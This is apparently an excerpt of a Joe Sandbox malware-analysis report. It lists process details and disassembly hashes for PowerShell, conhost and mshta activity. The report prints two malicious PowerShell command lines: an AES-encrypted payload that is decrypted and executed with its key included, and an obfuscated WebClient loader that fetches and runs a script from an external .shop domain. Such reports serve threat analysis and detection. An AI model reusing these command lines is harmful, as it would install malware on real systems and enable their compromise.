                                                      Start date:31/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D0330D3F3E88BE2C45BB0C420751EC6D9A4B10B354AA9B10D7039997896CBC84E96ED894759B7F6EC303D431A1C284E80B0F41DD7B7095C39DFA3FFA3C5DAC6503E4E7D2A9357E4D1035C7529DAF56510661E0073D0774CC37C6D50823062C71BD864FA83B7C62B39136EF3D2B925C41C459527BD11BD88B2C0EFB234AF3A9BEC1D80B39780B48025DFF5F6C178B93DDF712850D1DF01DDF854BCDC17A251FF77FCE0C9538100E20B760941EB486C522975B34051141DC18EF0568AFA1572E0FA83A5BC2690D31086904583C27EE9C817B126F2253CF3CCD1704914D8640C18CA31D535669F9FD6A603DD53F72A57B9CD5430327727286E7BAAD13A6FFC39662E283A7FF978BFBF5FC5CC5AD1B6532DAD68D41E04F618D40AF75F747B2981066564E6D25416F3791017B463E698B280398C63BC8933C29AF09616A94C3BEA7D4DB384704BEC738B9921BF8898C01D30527E0AC949344494C49B43088E1CCC8686C23391F17452B02D5B81B43B2D2C06B9F16A23E9E9D87814CE2370D93C6FA82BA38C67929FD4899A473FE61DC37CA5A87F2EF8787A58DFA80CAB07CA991B121E35B8C81230AE958AE8E041C71E8D01DDBA8E8B5FC137E517D861E573DDF771C76B9FF74293555133275E31FC6A9DD69E2383D6D68BA4A50C71EB2A01AC0D83ED9D780D8E2C705249A5FB8BFE6075BF00425C865366BF8B7520989948982EC086CB930C60BFD2A43919A6D60A56DB6D5147D44BDA26305E434FBAEB0372ECFF4AF87A4D8C4C335E58BEF871285E7EB21F6E254351190F01B546758AEB96D90EAC30AE12B03A24FC2F97D3E421D8714C4CBAC8A57055D7B008B6C2BAF399731AA3200F812001847FB33B62F48E736887780A85C4673F47E7ED462E33E1548C32D0267151021174D334A2D5A504C69A4558F49E6F1B0219CB89D4B6D3773C0D9D1AD71754E9FF3938CBBCBFFEDDE23BA04DCE969E1D8B3904AFA17A972C310F35BCF0D222510068B1DCA603907C82B4E210FDBC369FFFC25846BB4F20E2859617B32043C903816DE80A42B6E9E87F83C3747BFD728BBC1280E82110C8C4979D26AB88E59076F703E098EF3965B72D2B9804D2E94D41B50BC31EF628704BFC95A21A38302980725E11668416D8B1446E5D0C6855E9EA62636E456872FA1A80C8E4410D6871AF6AE9E0E601497E4F1A7F61DC6F43E939B216392102D05EE16C0164C7B92D9CC1CCC6D70E28514EE6924ECEAD49A161ABD47DF4A06F7ED617E02E525D5118BC8244B9298001EAA02AA3874785A6BFCDF3F8DF9DF76F9DBC541CF7B1A069EEB3CB9550D16');$IoNU=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((FRsZn('444C5A775845534878786D7A6C446679')),[byte[]]::new(16)).TransformFinalBlock($VUQBu,0,$VUQBu.Length)); & $IoNU.Substring(0,3) $IoNU.Substring(129)
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:23:36:02
                                                      Start date:31/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:23:36:08
                                                      Start date:31/12/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
                                                      Imagebase:0x890000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:23:36:08
                                                      Start date:31/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Executed Functions

                                                        Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1669775097.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b890000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                        • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                        • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41

                                                        Executed Functions

                                                        Function 000001F822D311FF Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000003.1874183554.000001F822D30000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001F822D31000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_3_1f822d30000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 190f18dc65f2d600bdeb0b2306d9b276d223726b990763eb21240695463127c9
                                                        • Instruction ID: c99566aded798a3b03a8c1e28addeac629123257398749c2ff0670300720a659
                                                        • Opcode Fuzzy Hash: 190f18dc65f2d600bdeb0b2306d9b276d223726b990763eb21240695463127c9
                                                        • Instruction Fuzzy Hash: 6311C63160DBCA0FF79A567884293B836E0DB42351F5900FBD446CB1F2ED289C95C722
                                                        Function 000001F822D311FF Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000003.1874183554.000001F822D30000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001F822D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_3_1f822d30000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 190f18dc65f2d600bdeb0b2306d9b276d223726b990763eb21240695463127c9
                                                        • Instruction ID: c99566aded798a3b03a8c1e28addeac629123257398749c2ff0670300720a659
                                                        • Opcode Fuzzy Hash: 190f18dc65f2d600bdeb0b2306d9b276d223726b990763eb21240695463127c9
                                                        • Instruction Fuzzy Hash: 6311C63160DBCA0FF79A567884293B836E0DB42351F5900FBD446CB1F2ED289C95C722
                                                        Function 000001F8209C0F89 Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000003.1874221914.000001F8209C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001F8209C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_3_1f8209c0000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                        • Instruction ID: 341e0a4ee47ab9c4710922e5c682c9956b5a94ba92e02077ccb447f935ca65b3
                                                        • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                        • Instruction Fuzzy Hash: CF90022489550755E52415910C493AC504163CC250FD44494481B90144D85D12D75153
                                                        Function 000001F8209C0F81 Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000003.1874221914.000001F8209C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001F8209C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_3_1f8209c0000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                        • Instruction ID: 341e0a4ee47ab9c4710922e5c682c9956b5a94ba92e02077ccb447f935ca65b3
                                                        • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                        • Instruction Fuzzy Hash: CF90022489550755E52415910C493AC504163CC250FD44494481B90144D85D12D75153
                                                        Function 000001F8209C0F79 Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000003.1874221914.000001F8209C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001F8209C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_3_1f8209c0000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                        • Instruction ID: 341e0a4ee47ab9c4710922e5c682c9956b5a94ba92e02077ccb447f935ca65b3
                                                        • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                        • Instruction Fuzzy Hash: CF90022489550755E52415910C493AC504163CC250FD44494481B90144D85D12D75153
                                                        Function 000001F8209C0FA9 Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000003.1874221914.000001F8209C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001F8209C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_3_1f8209c0000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                        • Instruction ID: 341e0a4ee47ab9c4710922e5c682c9956b5a94ba92e02077ccb447f935ca65b3
                                                        • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                        • Instruction Fuzzy Hash: CF90022489550755E52415910C493AC504163CC250FD44494481B90144D85D12D75153
                                                        Function 000001F8209C0F99 Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000003.1874221914.000001F8209C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001F8209C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_3_1f8209c0000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                        • Instruction ID: 341e0a4ee47ab9c4710922e5c682c9956b5a94ba92e02077ccb447f935ca65b3
                                                        • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                        • Instruction Fuzzy Hash: CF90022489550755E52415910C493AC504163CC250FD44494481B90144D85D12D75153
                                                        Function 000001F8209C0FC1 Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000003.1874221914.000001F8209C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001F8209C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_3_1f8209c0000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                        • Instruction ID: 341e0a4ee47ab9c4710922e5c682c9956b5a94ba92e02077ccb447f935ca65b3
                                                        • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                        • Instruction Fuzzy Hash: CF90022489550755E52415910C493AC504163CC250FD44494481B90144D85D12D75153

                                                        Executed Functions

                                                        Function 00007FFD9B1F38D4 Relevance: 4.9, Strings: 3, Instructions: 1108COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869842046.00007FFD9B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b1f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 7^$x6^$x6^
                                                        • API String ID: 0-3779041855
                                                        • Opcode ID: a344cbb0169b22d4ca4d773de9f63651de8623219f56709b6bd38f4672320bec
                                                        • Instruction ID: 6838df4581ff179819855462d0545f37e72d78e318c6f24d4798a28ca0f8caed
                                                        • Opcode Fuzzy Hash: a344cbb0169b22d4ca4d773de9f63651de8623219f56709b6bd38f4672320bec
                                                        • Instruction Fuzzy Hash: 56725472B0E6CA4FE7AADB6888655647FE1EF56304F1900FED04DCB1E3D929A846C341
                                                        Function 00007FFD9B129D56 Relevance: .5, Instructions: 468COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869212825.00007FFD9B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 47af096a7beb4c4594bae026a9d815c61aca19ae69dbcf4eaedbadeb66f93ab4
                                                        • Instruction ID: e24217e151608a85ae76425e9b0af7c3508357e373595418e812985e040b2bbf
                                                        • Opcode Fuzzy Hash: 47af096a7beb4c4594bae026a9d815c61aca19ae69dbcf4eaedbadeb66f93ab4
                                                        • Instruction Fuzzy Hash: 4EF1A331A19A8D8FEBA8DF28C855BE937D1FF54314F04427EE84DC7295DB3899418B82
                                                        Function 00007FFD9B12AF02 Relevance: .5, Instructions: 454COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869212825.00007FFD9B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bd08d29df514cd476d285cef56b8dd4f4c2510118d60a33c51d7236993a60ca5
                                                        • Instruction ID: be375bbf2b2afa3f3ae61d7f7264e60a0d76c1049901e4e115cbecf6b70ce594
                                                        • Opcode Fuzzy Hash: bd08d29df514cd476d285cef56b8dd4f4c2510118d60a33c51d7236993a60ca5
                                                        • Instruction Fuzzy Hash: 3AE1E731A09A8D8FEBA8DF28D8657E977E1FF54310F04426ED84DC7295DF34A9818781
                                                        Function 00007FFD9B1F32A9 Relevance: .7, Instructions: 687COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869842046.00007FFD9B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b1f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1192a48acc291c6117b98b8355a7d3aa8a977d789550e2066438de6aa70241ca
                                                        • Instruction ID: 5faae8b19eef7edb44be65755094821a36ad07d902cac907e466dc75a81f3801
                                                        • Opcode Fuzzy Hash: 1192a48acc291c6117b98b8355a7d3aa8a977d789550e2066438de6aa70241ca
                                                        • Instruction Fuzzy Hash: 6F223572B0EA894FE7A5DBA888655687BE1FF56314B1900BED05DC71E3DE29AC42C301
                                                        Function 00007FFD9B1F241D Relevance: .5, Instructions: 454COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869842046.00007FFD9B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b1f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fb6f1e04046fe2b0197a7a4498ebcc4c1f644c1195ea6ecc8929b96c80b6f829
                                                        • Instruction ID: ba189e09446a68f4e326395e3b0c2b82f56893fbebe208e6b6b3cf4ed44f47cb
                                                        • Opcode Fuzzy Hash: fb6f1e04046fe2b0197a7a4498ebcc4c1f644c1195ea6ecc8929b96c80b6f829
                                                        • Instruction Fuzzy Hash: B3D11463B0FA8E0FEB66ABE848754B57F90EF56354B4900FAE45CC70E3D919A905C381
                                                        Function 00007FFD9B12AACD Relevance: .4, Instructions: 411COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869212825.00007FFD9B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 00146838c8306145332720e46fe84e8cd0a49047d8011d8eac4b926943b4719b
                                                        • Instruction ID: cfef3c5a2e4901eaf3c99c621cca9914f89e9af5e25aea021b756e9494ac748b
                                                        • Opcode Fuzzy Hash: 00146838c8306145332720e46fe84e8cd0a49047d8011d8eac4b926943b4719b
                                                        • Instruction Fuzzy Hash: E8D12572A1DA8D4FEB68DF28C8657E93BE0FF55314F04427AD84DC7292DE34A9428781
                                                        Function 00007FFD9B1F405D Relevance: .3, Instructions: 267COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869842046.00007FFD9B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b1f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1e236b12bb7fced0c627d8a50d8719ec71efc46b8457e5e3ddb217d1fb01c15d
                                                        • Instruction ID: 4fb967b96b9a79df8fbba6034499ed658dbb244eef1fb870a5000ea54cf0823b
                                                        • Opcode Fuzzy Hash: 1e236b12bb7fced0c627d8a50d8719ec71efc46b8457e5e3ddb217d1fb01c15d
                                                        • Instruction Fuzzy Hash: 93914773B0EA898FE769DB6884661687BE1EF55318F1400BED04DD71E3DD29AC41C345
                                                        Function 00007FFD9B12A214 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869212825.00007FFD9B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6cc26fd6a6263157d8da8d863e3910c0ed46041d6a89d5dce17072e33b94d695
                                                        • Instruction ID: 336602aa267bedb11b185ce78b4de948f8d43e9fec3804e90286e2f6381852b3
                                                        • Opcode Fuzzy Hash: 6cc26fd6a6263157d8da8d863e3910c0ed46041d6a89d5dce17072e33b94d695
                                                        • Instruction Fuzzy Hash: 52310D31A2A64E8EFBB49F58CC2ABF932D1FF4131DF414139D44D960A2CA396A85CB11
                                                        Function 00007FFD9B123A05 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869212825.00007FFD9B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                        • Instruction ID: 5004c912797fa5de54a08eeb6e6b4a8434c1f80db3f3e8eee4f15695996a7ab3
                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                        • Instruction Fuzzy Hash: 3201677121CB0C4FD748EF0CE451AA5B7E0FB95364F10056DE58AC36A5D636E881CB45
                                                        Function 00007FFD9B1F04D8 Relevance: .0, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869842046.00007FFD9B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b1f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d885b1242c2f62eb2a17b5a064c52a67399cee03e9fb4806513f8aad7ea23fd
                                                        • Instruction ID: 37bf983555e4ae7eba7a5e7799e60d01868418d7d723ccaa2e0300ddaaad9360
                                                        • Opcode Fuzzy Hash: 2d885b1242c2f62eb2a17b5a064c52a67399cee03e9fb4806513f8aad7ea23fd
                                                        • Instruction Fuzzy Hash: D5E09A23F0E86E0EEBB1EA98282D1F86A81EF55B2570901B6E92CE31B1DC009C108381

                                                        Non-executed Functions

                                                        Function 00007FFD9B123EA5 Relevance: .1, Instructions: 137COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869212825.00007FFD9B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 233867fc90185c08c2bdf2fc463a0285917d6bc71c0941dea84fe5c189b15d5b
                                                        • Instruction ID: 25a0a411043c813219834c8e366a85f97789d359366eba799566387e5e0a42aa
                                                        • Opcode Fuzzy Hash: 233867fc90185c08c2bdf2fc463a0285917d6bc71c0941dea84fe5c189b15d5b
                                                        • Instruction Fuzzy Hash: 9341E753A0F7C65FE76357BCB8B55A53BA0AF1366870E00F7D4D85E0E7EC0469068222

                                                        Executed Functions

                                                        Function 06F316A0 Relevance: 10.6, Strings: 8, Instructions: 556COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-2570431154
                                                        • Opcode ID: 8f2028aa17ac17eb4749a506c35fc88ee2fb3115ac22f0577102dd9b94f2cccb
                                                        • Instruction ID: 56f5db5e41b21d5ce2b552bd7645e73b2fab20ea233148d1d721afcd6a5eb37e
                                                        • Opcode Fuzzy Hash: 8f2028aa17ac17eb4749a506c35fc88ee2fb3115ac22f0577102dd9b94f2cccb
